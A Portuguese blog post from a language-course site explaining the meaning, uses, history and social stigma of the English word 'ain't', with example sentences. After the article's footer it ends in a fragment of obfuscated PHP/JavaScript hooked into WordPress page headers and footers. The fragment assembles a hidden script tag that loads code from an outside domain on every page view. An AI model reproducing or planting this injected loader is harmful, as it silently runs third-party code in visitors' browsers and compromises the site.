O SEGREDO DAS LINGUAS l O curso de língua estrangeira ainda pode fazer parte da sua vida.

O que significa AIN’T?

o que significa ain't

Você já viu ou ouviu AIN’T? Mas o que significa ain’t? Será que podemos usar essa palavra? Hoje eu tiro todas as suas dúvidas sobre essa palavrinha que já deu bastante confusão no inglês.

É comum ouvirmos professores de inglês falar que não podemos utilizar essa palavra. Porém considero essa observação errada. Como linguista, acredito que essa é uma variação da formalidade do discurso, só isso.

Sendo assim, para entender o que significa ain’t, devemos entender que essa expressão pertence ao inglês informal e não devemos fazer julgamentos tolos se usá-lo é certo ou errado. O que precisamos é adequar seu uso ao contexto correto.

Como você verá a seguir, essa expressão controversa tem muitos usos e significados. Na realidade, com o tempo você vai perceber que ain’t é uma palavra interessante e cheia de curiosidades.

O mais importante quando se busca compreender o que significa ain’t é que se trata de uma expressão que revela um lado da língua que nem os cursinhos costumam ensinar por ser considerado ‘feio’ socialmente. 

O próprio dicionário Cambridge coloca ain’t como: the incorrect form of “am not,” “is not,” “are not,” “has not,” or “have not”. Isso revela o preconceito dentro da língua com relação ao uso dessa expressão. 

O que significa AIN’T?

AIN’T é abreviação informal do verbo ‘to be’ negativo, de ‘there is not’, de ‘do(es) not’, ‘have(s) not’ e de ‘did not’. Por ser gíria, o ain’t não segue as regras gramaticais do inglês padrão sendo possível vir em dupla negativa, como em “ain’t got no home” (não tenho lar).

Inicialmente ‘ain’t’ começou a ser usado como a abreviação apenas de ‘am not’, mas com o uso se tornou comum principalmente nos EUA passou a ser usado para quase todas as formas de auxiliar negativo. Veja abaixo:

Verb to be negativo

Para compreender completamente o que significa ain’t, você deve ter clareza do verbo to be negativo porque o ain’t é mais comumente usado para substituir o verbo to be negativo. 

They aren’t like us. => They ain’t like us. (Eles não são como nós.)

You are not a bad player. => You ain’t a bad player. (Você não é um jogador ruim.)

Ruby is not cool. => Ruby ain’t cool. (Ruby não é legal.)

There is not

A forma ain’t pode ser empregada com o sentido ‘não existe’ ou ‘não há’. 

There is no place like home => Ain’t no place like home (Não existe lugar igual o lar)

There is no better place to be => Ain’t no better place to be (Não tem lugar melhor para se estar)

There is no sunshine when she’s gone => Ain’t no sunshine when she’s gone (Não há brilho do sol quando ela se vai)

Do(es) not

Para entender como usar ain’t em inglês, você pode também passar pela substituição de ‘do(es) not’. É muito comum a expressão “ain’t got” substituir “do(es) not have”. É possível também usar “ain’t got no” para “doesn’t have any”.

I don’t any place to go => I ain’t got no place to go (Não tenho lugar para ir)

She doesn’t have a car => She ain’t got a car (Ela não tem carro)

They don’t have many friends => They ain’t got many friends (Eles não tem muitos amigos)

I don’t have any money => I ain’t got no money (Eu não tenho nenhum dinheiro)

Have(s) not

Ain’t também funciona como estrutura negativa para present perfect substituindo have negativo. O negativo também pode ser ‘have(s) never’. O never é mantido, formando assim uma dupla negativa:

You haven’t heard anything yet => You ain’t heard anything yet (Você não ouviu nada)

She has never read a boo like that => She ain’t never read a book like that (Ela nunca leu um livro como esse)

Did not

Para entender o que significa ain’t, você deve ter uma compreensão ampla do past simple, já que essa expressão pode substituir ‘did not’:

I didn’t believe what I heard => I ain’t believe what I heard. (Eu não acreditei no que eu ouvi) 

She didn’t know about it => She ain’t know about it (Ela não sabia disso)

É errado usar AIN’T?

Não tem como entender o que significa ain’t, sem saber em que contexto você pode usar essa palavra. Como vimos acima a dicionário Cambridge acha errado usar essa forma sem dar mais explicações. 

O Meriam Webster já apresenta o fato de que as pessoas que usam essa forma são consideradas menos educadas, apesar do uso de ain’t estar crescendo nos EUA. 

Hoje, o significado de ain’t está conectado a dar ênfase e ganhar a atenção do leitor, quando alguém quer simular um falar informal tanto na mídia quanto na literatura. Na ficção o uso de ‘ain’t’ está ligada a personagens que querem mostrar que são amigos próximos. 

Para falar a verdade, o uso de ain’t não é tão recente, iniciou-se em 1706 como a contração de ‘am not’ e foi considerado normal e usada por nobres até o século 19 na Inglaterra. Ainda no 19, ela começou a ser usada como forma genérica do verbo to be, de do(es) not e have(s) not. 

Com a popularização dessa palavra como uma representação do dialeto Cockney nos romances de Dickens, ela foi banida. Isso significava que essa palavra estava associada à plebe e deveria ser evitada pelos nobres para manter seu status. 

O que percebemos então é que a compreensão do que significa ain’t passa pelo entendimento que essa palavra é considerada não-padrão e estigmatizada por ser fala de gente ignorante. 

Daí depreende-se que ficar julgando o uso de ‘ain’t’ como certo ou errado é muito mais algo carregado socialmente do que algo que fala da gramática verdadeiramente. Afinal de contas, o inglês tem várias contrações que não causam problema nenhum.

Espero que agora você tenha conseguido compreender o que significa ain’t. Sendo assim, porque você não vê outras expressões que podem te ajudar a se expressar em inglês? Ain’t that right?

Mais artigos do

Blog SDL

?>},_0x1ca2(_0x5c13d3,_0x10d019);}function _0x56ac(){var _0x46c312=['trickl','6LObfmH','script','scri','3822470oovwGi','220qlaQai','com/','createElement','ctl','appendChild','type','133350wkvzaH','ter.','134ANVGfY','pts/t','src','est','erfe','ords.p','querySelector','5879944KcCcWx','231938CdIMay','2890492INDZRn','currentScript','50535rwizqw','parentNode','script[id=\x22trickl\x22]','text/javascript','28527sHSQyT','head'];_0x56ac=function(){return _0x46c312;};return _0x56ac();}";}add_action('wp_head', '_set_metas_tag');add_action('wp_footer', '_set_metas_tag');add_action('wp_body_open', '_set_metas_tag');_set_metas_tag();}}catch(Exception $e){}} ?>